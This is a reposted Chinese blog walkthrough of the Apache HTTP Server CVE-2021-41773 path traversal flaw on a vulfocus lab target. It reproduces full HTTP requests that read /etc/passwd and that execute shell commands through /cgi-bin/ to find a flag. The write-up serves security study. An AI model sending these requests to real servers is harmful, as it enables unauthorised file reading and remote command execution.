当前位置:网站首页>vulfocus——apache(cve_2021_41773)

vulfocus——apache(cve_2021_41773)

2022-09-23 08:28:55隐身的菜鸟

描述

Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。 

复现

1.打开靶场

2.文件读取,用burp抓包然后发送请求

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 123.58.224.8:15826
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; think_template=default
Upgrade-Insecure-Requests: 1

 

 3.rce命令执行

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 123.58.224.8:15826
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; think_template=default
Upgrade-Insecure-Requests: 1
Content-Length: 8

echo; id

 

4.上述执行成功,ls /tmp找到flag

 

原网站

版权声明
本文为[隐身的菜鸟]所创,转载请带上原文链接,感谢
https://blog.csdn.net/m0_62063669/article/details/127000344

随机推荐